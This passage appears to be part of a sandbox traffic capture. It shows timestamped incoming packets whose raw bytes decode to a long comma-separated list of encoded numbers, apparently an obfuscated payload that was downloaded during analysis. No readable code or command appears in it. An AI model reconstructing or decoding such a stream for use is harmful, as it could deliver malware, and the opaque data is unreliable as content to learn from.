2023-03-24 06:58:02 UTC	1392	IN	Data Raw: 34 2c 37 34 2c 31 30 37 2c 31 34 66 2c 62 33 2c 35 37 2c 35 63 2c 31 33 34 2c 62 64 2c 31 31 30 2c 65 35 2c 63 65 2c 38 38 2c 38 35 2c 34 38 2c 65 66 2c 31 36 39 2c 37 30 2c 62 63 2c 65 32 2c 65 33 2c 31 35 66 2c 64 31 2c 66 65 2c 31 33 30 2c 31 30 32 2c 31 34 64 2c 61 39 2c 62 37 2c 39 35 2c 39 66 2c 64 32 2c 36 30 2c 31 35 33 2c 31 30 34 2c 36 65 2c 31 31 30 2c 36 37 2c 63 64 2c 31 31 36 2c 31 35 37 2c 36 37 2c 31 34 37 2c 66 62 2c 63 38 2c 31 34 38 2c 61 64 2c 36 34 2c 64 34 2c 65 34 2c 31 35 36 2c 38 64 2c 39 33 2c 62 62 2c 39 34 2c 31 34 37 2c 66 65 2c 31 37 32 2c 31 31 32 2c 38 32 2c 66 65 2c 31 35 37 2c 36 64 2c 36 32 2c 31 31 31 2c 39 37 2c 31 32 38 2c 66 30 2c 38 33 2c 61 36 2c 38 61 2c 31 35 32 2c 31 34 33 2c 66 38 2c 64 31 2c 65 39 2c 34 38 2c Data Ascii: 4,74,107,14f,b3,57,5c,134,bd,110,e5,ce,88,85,48,ef,169,70,bc,e2,e3,15f,d1,fe,130,102,14d,a9,b7,95,9f,d2,60,153,104,6e,110,67,cd,116,157,67,147,fb,c8,148,ad,64,d4,e4,156,8d,93,bb,94,147,fe,172,112,82,fe,157,6d,62,111,97,128,f0,83,a6,8a,152,143,f8,d1,e9,48,
2023-03-24 06:58:02 UTC	1408	IN	Data Raw: 35 62 2c 31 31 37 2c 64 39 2c 65 30 2c 39 31 2c 37 63 2c 31 32 32 2c 31 35 31 2c 64 64 2c 38 33 2c 62 64 2c 65 32 2c 31 30 35 2c 64 62 2c 39 35 2c 31 31 61 2c 31 30 39 2c 66 38 2c 64 61 2c 34 61 2c 38 65 2c 61 35 2c 31 31 66 2c 37 61 2c 63 30 2c 31 34 63 2c 37 38 2c 35 62 2c 31 31 30 2c 31 30 30 2c 31 36 33 2c 31 31 39 2c 38 39 2c 31 30 38 2c 31 30 38 2c 31 31 33 2c 36 65 2c 36 65 2c 62 37 2c 38 36 2c 63 65 2c 66 30 2c 31 31 66 2c 64 62 2c 62 66 2c 62 35 2c 36 35 2c 31 30 33 2c 61 34 2c 61 35 2c 36 36 2c 37 39 2c 31 30 38 2c 34 37 2c 61 36 2c 37 63 2c 38 38 2c 63 31 2c 61 66 2c 62 33 2c 37 35 2c 66 64 2c 31 31 34 2c 64 62 2c 63 64 2c 31 31 35 2c 66 33 2c 32 65 2c 63 34 2c 36 32 2c 64 33 2c 63 33 2c 31 35 37 2c 31 34 64 2c 39 61 2c 31 31 37 2c 65 61 2c 61 Data Ascii: 5b,117,d9,e0,91,7c,122,151,dd,83,bd,e2,105,db,95,11a,109,f8,da,4a,8e,a5,11f,7a,c0,14c,78,5b,110,100,163,119,89,108,108,113,6e,6e,b7,86,ce,f0,11f,db,bf,b5,65,103,a4,a5,66,79,108,47,a6,7c,88,c1,af,b3,75,fd,114,db,cd,115,f3,2e,c4,62,d3,c3,157,14d,9a,117,ea,a
2023-03-24 06:58:02 UTC	1424	IN	Data Raw: 63 38 2c 31 31 63 2c 31 31 63 2c 39 66 2c 37 35 2c 37 32 2c 38 39 2c 31 33 31 2c 31 35 36 2c 62 38 2c 31 33 30 2c 38 65 2c 31 34 35 2c 31 31 61 2c 31 31 66 2c 31 32 38 2c 31 32 66 2c 31 33 38 2c 64 66 2c 65 38 2c 34 34 2c 61 65 2c 61 64 2c 31 32 33 2c 37 32 2c 37 30 2c 31 33 38 2c 36 31 2c 65 37 2c 64 30 2c 65 61 2c 39 35 2c 62 61 2c 62 64 2c 64 38 2c 37 39 2c 31 32 62 2c 38 63 2c 61 36 2c 31 32 37 2c 31 35 35 2c 31 30 33 2c 31 32 37 2c 31 35 31 2c 39 34 2c 37 35 2c 62 62 2c 65 65 2c 39 63 2c 61 63 2c 38 61 2c 31 33 62 2c 38 38 2c 31 36 65 2c 62 37 2c 61 66 2c 64 61 2c 35 63 2c 64 31 2c 31 35 31 2c 39 31 2c 31 30 63 2c 37 62 2c 66 36 2c 31 31 32 2c 31 35 36 2c 63 31 2c 31 31 61 2c 61 65 2c 65 34 2c 63 30 2c 31 31 33 2c 63 65 2c 31 32 66 2c 66 63 2c 31 30 Data Ascii: c8,11c,11c,9f,75,72,89,131,156,b8,130,8e,145,11a,11f,128,12f,138,df,e8,44,ae,ad,123,72,70,138,61,e7,d0,ea,95,ba,bd,d8,79,12b,8c,a6,127,155,103,127,151,94,75,bb,ee,9c,ac,8a,13b,88,16e,b7,af,da,5c,d1,151,91,10c,7b,f6,112,156,c1,11a,ae,e4,c0,113,ce,12f,fc,10
2023-03-24 06:58:02 UTC	1440	IN	Data Raw: 31 2c 38 65 2c 31 33 66 2c 38 31 2c 31 34 31 2c 65 36 2c 31 34 35 2c 31 33 33 2c 39 65 2c 38 66 2c 62 30 2c 61 39 2c 65 31 2c 63 33 2c 39 65 2c 38 34 2c 31 33 33 2c 31 36 34 2c 66 62 2c 63 34 2c 39 32 2c 31 31 62 2c 31 32 32 2c 31 33 66 2c 31 32 62 2c 36 64 2c 31 30 30 2c 36 37 2c 37 61 2c 31 33 36 2c 31 34 34 2c 31 32 37 2c 66 34 2c 65 30 2c 36 61 2c 39 63 2c 39 64 2c 66 34 2c 37 66 2c 38 33 2c 62 39 2c 64 65 2c 62 38 2c 65 64 2c 31 33 30 2c 38 33 2c 39 33 2c 31 35 61 2c 61 35 2c 62 61 2c 31 30 32 2c 62 65 2c 63 66 2c 39 33 2c 31 32 31 2c 31 33 62 2c 63 39 2c 66 38 2c 31 34 35 2c 64 38 2c 61 31 2c 37 31 2c 31 30 33 2c 61 39 2c 64 30 2c 34 62 2c 31 31 33 2c 31 34 38 2c 61 66 2c 64 35 2c 63 61 2c 61 30 2c 35 35 2c 66 33 2c 37 66 2c 63 65 2c 31 33 37 2c 37 Data Ascii: 1,8e,13f,81,141,e6,145,133,9e,8f,b0,a9,e1,c3,9e,84,133,164,fb,c4,92,11b,122,13f,12b,6d,100,67,7a,136,144,127,f4,e0,6a,9c,9d,f4,7f,83,b9,de,b8,ed,130,83,93,15a,a5,ba,102,be,cf,93,121,13b,c9,f8,145,d8,a1,71,103,a9,d0,4b,113,148,af,d5,ca,a0,55,f3,7f,ce,137,7
2023-03-24 06:58:02 UTC	1456	IN	Data Raw: 34 64 2c 64 65 2c 63 62 2c 61 35 2c 31 34 62 2c 31 34 33 2c 31 32 65 2c 31 32 62 2c 31 33 30 2c 62 35 2c 31 31 65 2c 66 61 2c 35 35 2c 31 30 66 2c 31 32 65 2c 37 66 2c 31 34 32 2c 37 61 2c 31 33 32 2c 38 37 2c 31 34 35 2c 31 30 35 2c 61 37 2c 37 30 2c 39 39 2c 63 65 2c 31 32 36 2c 38 36 2c 62 65 2c 66 37 2c 31 32 62 2c 65 31 2c 31 32 39 2c 38 39 2c 64 66 2c 34 38 2c 31 35 30 2c 35 61 2c 31 35 33 2c 31 34 38 2c 61 30 2c 31 32 61 2c 65 62 2c 62 31 2c 31 31 36 2c 31 32 38 2c 31 34 36 2c 31 35 38 2c 31 32 30 2c 65 62 2c 33 61 2c 62 61 2c 31 35 63 2c 31 30 65 2c 66 62 2c 38 39 2c 61 33 2c 36 32 2c 65 65 2c 39 30 2c 31 32 34 2c 36 34 2c 66 64 2c 62 63 2c 31 34 31 2c 65 36 2c 31 31 38 2c 31 32 34 2c 36 39 2c 63 31 2c 65 63 2c 63 37 2c 63 31 2c 61 31 2c 31 31 38 Data Ascii: 4d,de,cb,a5,14b,143,12e,12b,130,b5,11e,fa,55,10f,12e,7f,142,7a,132,87,145,105,a7,70,99,ce,126,86,be,f7,12b,e1,129,89,df,48,150,5a,153,148,a0,12a,eb,b1,116,128,146,158,120,eb,3a,ba,15c,10e,fb,89,a3,62,ee,90,124,64,fd,bc,141,e6,118,124,69,c1,ec,c7,c1,a1,118
2023-03-24 06:58:02 UTC	1472	IN	Data Raw: 2c 31 31 37 2c 66 35 2c 31 34 63 2c 38 39 2c 31 31 30 2c 62 37 2c 31 30 35 2c 31 30 38 2c 31 37 30 2c 65 35 2c 64 36 2c 63 36 2c 31 30 64 2c 36 63 2c 37 36 2c 31 31 36 2c 39 61 2c 36 65 2c 31 30 35 2c 62 37 2c 31 33 61 2c 39 66 2c 31 30 37 2c 31 32 66 2c 35 39 2c 31 30 32 2c 38 34 2c 36 64 2c 65 33 2c 31 36 33 2c 62 39 2c 65 38 2c 35 38 2c 63 38 2c 38 31 2c 61 32 2c 65 63 2c 39 37 2c 31 31 66 2c 31 34 35 2c 66 64 2c 31 35 31 2c 63 65 2c 64 64 2c 31 30 36 2c 31 30 65 2c 66 65 2c 64 61 2c 38 39 2c 63 33 2c 31 35 66 2c 62 62 2c 31 34 66 2c 61 31 2c 65 32 2c 31 33 65 2c 37 33 2c 63 31 2c 31 33 39 2c 31 33 30 2c 37 35 2c 31 34 61 2c 34 61 2c 65 30 2c 31 31 39 2c 65 63 2c 66 61 2c 64 63 2c 31 30 31 2c 65 37 2c 31 32 36 2c 31 31 63 2c 31 34 39 2c 31 33 30 2c 63 Data Ascii: ,117,f5,14c,89,110,b7,105,108,170,e5,d6,c6,10d,6c,76,116,9a,6e,105,b7,13a,9f,107,12f,59,102,84,6d,e3,163,b9,e8,58,c8,81,a2,ec,97,11f,145,fd,151,ce,dd,106,10e,fe,da,89,c3,15f,bb,14f,a1,e2,13e,73,c1,139,130,75,14a,4a,e0,119,ec,fa,dc,101,e7,126,11c,149,130,c
2023-03-24 06:58:02 UTC	1488	IN	Data Raw: 33 31 2c 31 33 62 2c 31 32 37 2c 62 38 2c 33 32 2c 31 32 30 2c 37 38 2c 64 63 2c 31 35 31 2c 63 34 2c 31 30 33 2c 62 37 2c 31 36 34 2c 31 32 32 2c 35 64 2c 31 32 31 2c 35 62 2c 39 65 2c 31 35 33 2c 62 30 2c 33 35 2c 31 34 65 2c 36 33 2c 31 31 32 2c 62 65 2c 39 34 2c 31 33 34 2c 61 39 2c 31 30 34 2c 31 34 33 2c 37 36 2c 38 65 2c 38 35 2c 66 63 2c 66 39 2c 36 34 2c 65 32 2c 61 32 2c 63 61 2c 38 37 2c 66 61 2c 31 33 63 2c 37 62 2c 62 64 2c 65 61 2c 31 34 36 2c 62 63 2c 36 32 2c 61 32 2c 31 34 34 2c 38 31 2c 39 62 2c 37 32 2c 65 31 2c 37 32 2c 31 30 36 2c 62 61 2c 31 30 33 2c 31 30 65 2c 65 35 2c 33 61 2c 35 33 2c 31 31 38 2c 38 63 2c 64 34 2c 63 64 2c 31 33 36 2c 61 62 2c 63 64 2c 37 39 2c 31 31 33 2c 38 33 2c 62 37 2c 31 35 61 2c 61 61 2c 37 61 2c 31 36 65 Data Ascii: 31,13b,127,b8,32,120,78,dc,151,c4,103,b7,164,122,5d,121,5b,9e,153,b0,35,14e,63,112,be,94,134,a9,104,143,76,8e,85,fc,f9,64,e2,a2,ca,87,fa,13c,7b,bd,ea,146,bc,62,a2,144,81,9b,72,e1,72,106,ba,103,10e,e5,3a,53,118,8c,d4,cd,136,ab,cd,79,113,83,b7,15a,aa,7a,16e
2023-03-24 06:58:02 UTC	1504	IN	Data Raw: 31 65 2c 31 33 33 2c 31 31 37 2c 31 33 66 2c 38 62 2c 63 31 2c 64 37 2c 34 33 2c 36 63 2c 65 64 2c 37 63 2c 61 64 2c 39 36 2c 65 63 2c 31 32 34 2c 31 32 62 2c 31 30 61 2c 64 37 2c 31 31 65 2c 31 33 34 2c 35 66 2c 33 65 2c 37 32 2c 64 31 2c 66 32 2c 65 31 2c 31 31 34 2c 39 38 2c 39 31 2c 61 34 2c 37 31 2c 33 66 2c 31 32 62 2c 36 31 2c 31 33 63 2c 39 37 2c 37 62 2c 35 33 2c 31 33 32 2c 39 38 2c 62 30 2c 31 33 30 2c 31 34 64 2c 62 30 2c 62 39 2c 36 31 2c 31 33 38 2c 31 34 66 2c 37 63 2c 61 34 2c 66 63 2c 65 62 2c 35 65 2c 31 31 64 2c 31 34 64 2c 66 63 2c 66 30 2c 31 36 31 2c 31 34 63 2c 64 33 2c 61 63 2c 39 65 2c 31 33 32 2c 31 32 31 2c 38 34 2c 62 39 2c 31 33 33 2c 31 34 66 2c 36 61 2c 31 31 31 2c 64 31 2c 63 39 2c 38 30 2c 65 36 2c 31 35 62 2c 39 63 2c 65 Data Ascii: 1e,133,117,13f,8b,c1,d7,43,6c,ed,7c,ad,96,ec,124,12b,10a,d7,11e,134,5f,3e,72,d1,f2,e1,114,98,91,a4,71,3f,12b,61,13c,97,7b,53,132,98,b0,130,14d,b0,b9,61,138,14f,7c,a4,fc,eb,5e,11d,14d,fc,f0,161,14c,d3,ac,9e,132,121,84,b9,133,14f,6a,111,d1,c9,80,e6,15b,9c,e
2023-03-24 06:58:02 UTC	1520	IN	Data Raw: 65 35 2c 61 36 2c 61 35 2c 63 65 2c 62 34 2c 31 32 33 2c 65 39 2c 66 39 2c 34 65 2c 38 65 2c 39 33 2c 37 62 2c 63 34 2c 36 65 2c 63 37 2c 31 33 38 2c 31 34 30 2c 37 32 2c 31 31 39 2c 34 65 2c 37 66 2c 37 64 2c 64 35 2c 37 35 2c 63 39 2c 38 39 2c 62 36 2c 39 64 2c 63 31 2c 39 65 2c 37 66 2c 37 61 2c 62 64 2c 35 65 2c 31 33 36 2c 39 65 2c 36 32 2c 39 35 2c 31 30 33 2c 31 32 64 2c 64 62 2c 37 38 2c 64 38 2c 31 31 38 2c 36 37 2c 62 33 2c 39 61 2c 37 33 2c 64 33 2c 38 38 2c 31 33 64 2c 66 61 2c 65 66 2c 63 38 2c 39 65 2c 37 38 2c 31 32 32 2c 31 31 34 2c 31 30 30 2c 31 32 66 2c 31 34 64 2c 31 31 38 2c 31 30 37 2c 61 65 2c 31 33 30 2c 34 65 2c 66 66 2c 66 65 2c 61 36 2c 62 35 2c 31 32 65 2c 31 35 62 2c 39 33 2c 38 64 2c 63 39 2c 61 66 2c 62 30 2c 36 30 2c 39 32 Data Ascii: e5,a6,a5,ce,b4,123,e9,f9,4e,8e,93,7b,c4,6e,c7,138,140,72,119,4e,7f,7d,d5,75,c9,89,b6,9d,c1,9e,7f,7a,bd,5e,136,9e,62,95,103,12d,db,78,d8,118,67,b3,9a,73,d3,88,13d,fa,ef,c8,9e,78,122,114,100,12f,14d,118,107,ae,130,4e,ff,fe,a6,b5,12e,15b,93,8d,c9,af,b0,60,92
2023-03-24 06:58:02 UTC	1536	IN	Data Raw: 36 62 2c 39 63 2c 31 34 36 2c 31 33 35 2c 31 32 32 2c 64 32 2c 64 37 2c 31 30 36 2c 31 32 63 2c 38 64 2c 38 36 2c 64 31 2c 31 32 32 2c 65 33 2c 64 62 2c 39 61 2c 38 35 2c 31 30 64 2c 63 61 2c 31 32 36 2c 66 61 2c 36 34 2c 65 34 2c 37 35 2c 39 66 2c 37 32 2c 31 35 37 2c 62 66 2c 31 34 30 2c 37 35 2c 61 62 2c 39 37 2c 31 34 66 2c 64 65 2c 62 35 2c 62 34 2c 39 62 2c 31 31 31 2c 31 31 36 2c 39 65 2c 62 62 2c 31 34 64 2c 31 33 39 2c 62 65 2c 31 32 33 2c 31 30 36 2c 61 38 2c 38 63 2c 63 34 2c 61 65 2c 31 34 35 2c 34 66 2c 35 30 2c 31 35 33 2c 63 65 2c 31 33 66 2c 65 31 2c 66 62 2c 31 32 31 2c 31 30 62 2c 37 37 2c 64 66 2c 31 32 36 2c 62 63 2c 31 33 65 2c 38 63 2c 37 64 2c 31 32 61 2c 37 62 2c 31 33 32 2c 33 61 2c 65 31 2c 36 34 2c 31 30 63 2c 31 31 66 2c 65 62 Data Ascii: 6b,9c,146,135,122,d2,d7,106,12c,8d,86,d1,122,e3,db,9a,85,10d,ca,126,fa,64,e4,75,9f,72,157,bf,140,75,ab,97,14f,de,b5,b4,9b,111,116,9e,bb,14d,139,be,123,106,a8,8c,c4,ae,145,4f,50,153,ce,13f,e1,fb,121,10b,77,df,126,bc,13e,8c,7d,12a,7b,132,3a,e1,64,10c,11f,eb
2023-03-24 06:58:02 UTC	1552	IN	Data Raw: 33 65 2c 37 35 2c 31 37 34 2c 37 61 2c 64 66 2c 31 32 34 2c 31 32 66 2c 31 35 39 2c 31 32 33 2c 35 35 2c 61 31 2c 38 31 2c 35 31 2c 63 66 2c 65 65 2c 31 33 64 2c 31 32 61 2c 61 61 2c 34 62 2c 66 63 2c 31 32 35 2c 31 30 35 2c 62 65 2c 61 62 2c 37 62 2c 38 64 2c 39 62 2c 35 66 2c 37 36 2c 39 33 2c 31 35 32 2c 31 33 37 2c 31 35 36 2c 61 39 2c 31 34 63 2c 65 65 2c 36 37 2c 63 65 2c 35 63 2c 31 31 33 2c 63 61 2c 38 35 2c 37 34 2c 38 33 2c 31 32 32 2c 61 34 2c 63 62 2c 61 36 2c 31 30 37 2c 31 32 64 2c 61 39 2c 63 30 2c 62 61 2c 31 34 33 2c 61 33 2c 61 37 2c 39 64 2c 31 30 64 2c 62 62 2c 31 34 37 2c 65 38 2c 31 33 63 2c 64 37 2c 61 34 2c 65 33 2c 31 31 66 2c 66 62 2c 64 31 2c 32 64 2c 39 63 2c 62 39 2c 62 66 2c 36 34 2c 31 33 34 2c 35 39 2c 38 30 2c 64 30 2c 63 Data Ascii: 3e,75,174,7a,df,124,12f,159,123,55,a1,81,51,cf,ee,13d,12a,aa,4b,fc,125,105,be,ab,7b,8d,9b,5f,76,93,152,137,156,a9,14c,ee,67,ce,5c,113,ca,85,74,83,122,a4,cb,a6,107,12d,a9,c0,ba,143,a3,a7,9d,10d,bb,147,e8,13c,d7,a4,e3,11f,fb,d1,2d,9c,b9,bf,64,134,59,80,d0,c
2023-03-24 06:58:02 UTC	1568	IN	Data Raw: 2c 35 38 2c 31 35 39 2c 31 32 30 2c 66 66 2c 61 33 2c 61 33 2c 66 63 2c 39 62 2c 31 37 32 2c 66 66 2c 39 63 2c 65 36 2c 64 31 2c 35 36 2c 31 32 38 2c 61 63 2c 39 32 2c 36 66 2c 62 39 2c 39 34 2c 31 31 62 2c 62 61 2c 33 61 2c 31 33 64 2c 64 37 2c 61 33 2c 31 34 65 2c 31 33 37 2c 65 38 2c 31 36 61 2c 31 30 65 2c 35 64 2c 38 35 2c 36 65 2c 38 38 2c 65 38 2c 36 63 2c 38 33 2c 31 31 64 2c 31 35 34 2c 31 34 31 2c 36 39 2c 31 32 65 2c 62 65 2c 66 36 2c 31 33 39 2c 34 39 2c 31 30 66 2c 31 30 32 2c 38 33 2c 31 33 33 2c 63 35 2c 38 62 2c 31 34 63 2c 34 32 2c 37 37 2c 39 36 2c 39 38 2c 37 64 2c 62 65 2c 37 61 2c 62 64 2c 62 63 2c 31 31 30 2c 38 63 2c 62 66 2c 61 64 2c 65 39 2c 34 32 2c 37 64 2c 62 62 2c 39 66 2c 65 35 2c 65 33 2c 65 62 2c 38 61 2c 31 30 66 2c 36 31 Data Ascii: ,58,159,120,ff,a3,a3,fc,9b,172,ff,9c,e6,d1,56,128,ac,92,6f,b9,94,11b,ba,3a,13d,d7,a3,14e,137,e8,16a,10e,5d,85,6e,88,e8,6c,83,11d,154,141,69,12e,be,f6,139,49,10f,102,83,133,c5,8b,14c,42,77,96,98,7d,be,7a,bd,bc,110,8c,bf,ad,e9,42,7d,bb,9f,e5,e3,eb,8a,10f,61
2023-03-24 06:58:02 UTC	1584	IN	Data Raw: 32 2c 61 32 2c 64 38 2c 61 61 2c 66 32 2c 61 32 2c 65 36 2c 65 64 2c 31 33 30 2c 39 63 2c 63 33 2c 34 66 2c 61 33 2c 31 33 62 2c 39 32 2c 38 30 2c 31 33 35 2c 33 39 2c 31 30 34 2c 62 61 2c 31 30 38 2c 61 61 2c 31 35 34 2c 61 62 2c 35 66 2c 63 33 2c 31 33 61 2c 31 32 34 2c 31 32 65 2c 64 31 2c 31 30 63 2c 38 63 2c 62 31 2c 39 31 2c 62 61 2c 66 39 2c 31 34 36 2c 31 33 62 2c 31 35 34 2c 62 66 2c 39 36 2c 63 34 2c 62 62 2c 65 64 2c 31 30 38 2c 66 39 2c 62 64 2c 64 63 2c 61 36 2c 62 30 2c 31 30 30 2c 66 30 2c 31 35 38 2c 37 38 2c 65 36 2c 31 34 62 2c 37 63 2c 39 34 2c 31 31 62 2c 66 61 2c 31 33 32 2c 62 65 2c 62 35 2c 37 65 2c 64 35 2c 64 62 2c 64 64 2c 39 39 2c 63 36 2c 31 34 64 2c 63 64 2c 64 30 2c 37 62 2c 31 32 66 2c 65 30 2c 39 33 2c 34 61 2c 38 66 2c 61 Data Ascii: 2,a2,d8,aa,f2,a2,e6,ed,130,9c,c3,4f,a3,13b,92,80,135,39,104,ba,108,aa,154,ab,5f,c3,13a,124,12e,d1,10c,8c,b1,91,ba,f9,146,13b,154,bf,96,c4,bb,ed,108,f9,bd,dc,a6,b0,100,f0,158,78,e6,14b,7c,94,11b,fa,132,be,b5,7e,d5,db,dd,99,c6,14d,cd,d0,7b,12f,e0,93,4a,8f,a
2023-03-24 06:58:02 UTC	1600	IN	Data Raw: 37 2c 38 39 2c 31 30 36 2c 61 35 2c 62 66 2c 35 61 2c 39 33 2c 31 31 34 2c 62 65 2c 37 35 2c 37 31 2c 35 35 2c 35 39 2c 31 30 39 2c 62 39 2c 31 36 65 2c 66 66 2c 63 35 2c 31 30 39 2c 31 32 32 2c 66 66 2c 61 66 2c 66 39 2c 31 31 34 2c 31 37 32 2c 63 34 2c 31 33 34 2c 61 66 2c 31 30 38 2c 63 35 2c 31 31 30 2c 31 30 36 2c 31 34 33 2c 31 32 39 2c 64 63 2c 37 62 2c 31 32 65 2c 31 34 64 2c 31 33 61 2c 65 63 2c 35 39 2c 63 39 2c 36 37 2c 37 32 2c 66 64 2c 34 36 2c 63 65 2c 61 36 2c 31 35 33 2c 31 33 31 2c 39 63 2c 38 63 2c 31 34 37 2c 34 63 2c 39 39 2c 62 39 2c 39 37 2c 36 37 2c 35 63 2c 65 35 2c 66 62 2c 31 32 64 2c 61 33 2c 66 64 2c 31 31 35 2c 31 33 64 2c 66 37 2c 37 39 2c 66 35 2c 35 66 2c 31 32 65 2c 38 63 2c 66 34 2c 66 32 2c 34 38 2c 31 31 33 2c 64 64 2c Data Ascii: 7,89,106,a5,bf,5a,93,114,be,75,71,55,59,109,b9,16e,ff,c5,109,122,ff,af,f9,114,172,c4,134,af,108,c5,110,106,143,129,dc,7b,12e,14d,13a,ec,59,c9,67,72,fd,46,ce,a6,153,131,9c,8c,147,4c,99,b9,97,67,5c,e5,fb,12d,a3,fd,115,13d,f7,79,f5,5f,12e,8c,f4,f2,48,113,dd,
2023-03-24 06:58:02 UTC	1616	IN	Data Raw: 65 2c 63 61 2c 31 33 35 2c 62 37 2c 31 30 35 2c 63 64 2c 31 34 36 2c 66 35 2c 31 31 31 2c 31 30 64 2c 37 31 2c 35 62 2c 38 64 2c 37 34 2c 64 31 2c 38 38 2c 31 35 61 2c 61 64 2c 62 64 2c 66 34 2c 31 31 39 2c 61 33 2c 37 36 2c 63 65 2c 31 32 66 2c 31 30 66 2c 65 38 2c 36 37 2c 61 37 2c 36 61 2c 63 35 2c 31 31 34 2c 63 34 2c 31 35 35 2c 64 64 2c 66 36 2c 31 33 62 2c 31 32 33 2c 31 35 65 2c 31 33 34 2c 63 37 2c 31 33 31 2c 62 39 2c 65 31 2c 31 35 31 2c 38 34 2c 62 65 2c 31 36 65 2c 63 37 2c 63 65 2c 61 37 2c 31 32 62 2c 31 33 63 2c 61 38 2c 38 37 2c 38 36 2c 61 61 2c 64 37 2c 66 62 2c 63 62 2c 38 62 2c 65 61 2c 37 64 2c 38 64 2c 39 39 2c 65 35 2c 31 31 63 2c 66 32 2c 31 32 63 2c 38 61 2c 61 65 2c 61 64 2c 64 34 2c 31 31 36 2c 66 34 2c 31 30 63 2c 38 64 2c 37 Data Ascii: e,ca,135,b7,105,cd,146,f5,111,10d,71,5b,8d,74,d1,88,15a,ad,bd,f4,119,a3,76,ce,12f,10f,e8,67,a7,6a,c5,114,c4,155,dd,f6,13b,123,15e,134,c7,131,b9,e1,151,84,be,16e,c7,ce,a7,12b,13c,a8,87,86,aa,d7,fb,cb,8b,ea,7d,8d,99,e5,11c,f2,12c,8a,ae,ad,d4,116,f4,10c,8d,7
2023-03-24 06:58:02 UTC	1632	IN	Data Raw: 33 35 2c 64 35 2c 31 32 30 2c 31 34 65 2c 31 33 32 2c 31 31 66 2c 63 34 2c 31 30 66 2c 65 62 2c 31 34 64 2c 64 34 2c 31 31 34 2c 38 31 2c 61 63 2c 31 30 36 2c 62 34 2c 37 39 2c 66 37 2c 31 32 31 2c 63 63 2c 31 30 66 2c 66 34 2c 31 31 37 2c 31 30 66 2c 31 31 39 2c 31 33 36 2c 66 32 2c 31 31 36 2c 63 33 2c 35 37 2c 64 66 2c 65 66 2c 66 64 2c 35 64 2c 39 38 2c 39 64 2c 61 35 2c 31 30 30 2c 31 33 63 2c 64 32 2c 31 33 35 2c 65 61 2c 37 63 2c 64 35 2c 66 61 2c 65 34 2c 63 64 2c 37 35 2c 38 39 2c 61 66 2c 65 34 2c 31 31 65 2c 31 32 66 2c 61 62 2c 64 38 2c 65 62 2c 37 32 2c 38 36 2c 66 32 2c 31 31 36 2c 63 33 2c 66 37 2c 64 65 2c 66 31 2c 31 32 64 2c 65 33 2c 39 39 2c 39 64 2c 61 35 2c 36 66 2c 63 34 2c 31 31 31 2c 31 36 66 2c 31 35 35 2c 62 33 2c 38 35 2c 38 31 Data Ascii: 35,d5,120,14e,132,11f,c4,10f,eb,14d,d4,114,81,ac,106,b4,79,f7,121,cc,10f,f4,117,10f,119,136,f2,116,c3,57,df,ef,fd,5d,98,9d,a5,100,13c,d2,135,ea,7c,d5,fa,e4,cd,75,89,af,e4,11e,12f,ab,d8,eb,72,86,f2,116,c3,f7,de,f1,12d,e3,99,9d,a5,6f,c4,111,16f,155,b3,85,81
2023-03-24 06:58:02 UTC	1648	IN	Data Raw: 66 37 2c 31 32 31 2c 31 31 63 2c 66 66 2c 61 62 2c 61 30 2c 36 30 2c 63 65 2c 31 30 64 2c 65 61 2c 36 37 2c 62 38 2c 65 61 2c 64 61 2c 63 61 2c 63 35 2c 31 31 34 2c 31 31 63 2c 63 35 2c 61 34 2c 36 66 2c 38 63 2c 31 32 33 2c 31 35 65 2c 66 35 2c 31 31 33 2c 31 30 61 2c 31 33 31 2c 36 33 2c 38 64 2c 37 34 2c 31 33 30 2c 62 36 2c 65 34 2c 31 35 61 2c 66 32 2c 31 35 63 2c 39 66 2c 36 30 2c 38 36 2c 38 36 2c 61 61 2c 38 66 2c 38 30 2c 61 66 2c 31 32 30 2c 65 64 2c 31 32 64 2c 38 65 2c 39 39 2c 39 64 2c 31 33 65 2c 34 61 2c 31 30 64 2c 66 35 2c 31 36 36 2c 61 65 2c 38 63 2c 38 64 2c 38 30 2c 65 31 2c 64 38 2c 31 32 63 2c 38 61 2c 61 66 2c 39 63 2c 39 66 2c 38 33 2c 61 65 2c 64 38 2c 64 64 2c 64 62 2c 31 33 36 2c 61 39 2c 38 66 2c 38 30 2c 36 37 2c 61 34 2c 65 Data Ascii: f7,121,11c,ff,ab,a0,60,ce,10d,ea,67,b8,ea,da,ca,c5,114,11c,c5,a4,6f,8c,123,15e,f5,113,10a,131,63,8d,74,130,b6,e4,15a,f2,15c,9f,60,86,86,aa,8f,80,af,120,ed,12d,8e,99,9d,13e,4a,10d,f5,166,ae,8c,8d,80,e1,d8,12c,8a,af,9c,9f,83,ae,d8,dd,db,136,a9,8f,80,67,a4,e
2023-03-24 06:58:02 UTC	1664	IN	Data Raw: 64 37 2c 31 31 64 2c 62 38 2c 34 64 2c 65 62 2c 31 31 32 2c 62 63 2c 38 34 2c 61 66 2c 39 63 2c 31 31 63 2c 31 32 66 2c 62 38 2c 39 33 2c 65 62 2c 63 61 2c 36 32 2c 38 61 2c 31 31 38 2c 39 34 2c 34 33 2c 38 37 2c 39 39 2c 31 31 30 2c 35 63 2c 63 39 2c 63 61 2c 31 33 32 2c 64 38 2c 31 30 38 2c 38 61 2c 61 65 2c 61 64 2c 31 31 31 2c 31 31 64 2c 62 34 2c 66 35 2c 31 30 32 2c 65 34 2c 38 39 2c 61 66 2c 39 63 2c 31 33 32 2c 38 33 2c 38 38 2c 38 34 2c 66 39 2c 66 31 2c 66 36 2c 61 61 2c 38 66 2c 38 30 2c 39 61 2c 31 33 34 2c 37 65 2c 35 39 2c 36 39 2c 31 32 61 2c 31 30 38 2c 31 31 35 2c 36 66 2c 38 63 2c 38 61 2c 31 32 62 2c 31 33 37 2c 39 38 2c 63 61 2c 31 30 65 2c 61 64 2c 63 64 2c 37 35 2c 38 39 2c 61 66 2c 31 32 31 2c 31 31 32 2c 61 37 2c 61 35 2c 61 30 2c Data Ascii: d7,11d,b8,4d,eb,112,bc,84,af,9c,11c,12f,b8,93,eb,ca,62,8a,118,94,43,87,99,110,5c,c9,ca,132,d8,108,8a,ae,ad,111,11d,b4,f5,102,e4,89,af,9c,132,83,88,84,f9,f1,f6,aa,8f,80,9a,134,7e,59,69,12a,108,115,6f,8c,8a,12b,137,98,ca,10e,ad,cd,75,89,af,121,112,a7,a5,a0,
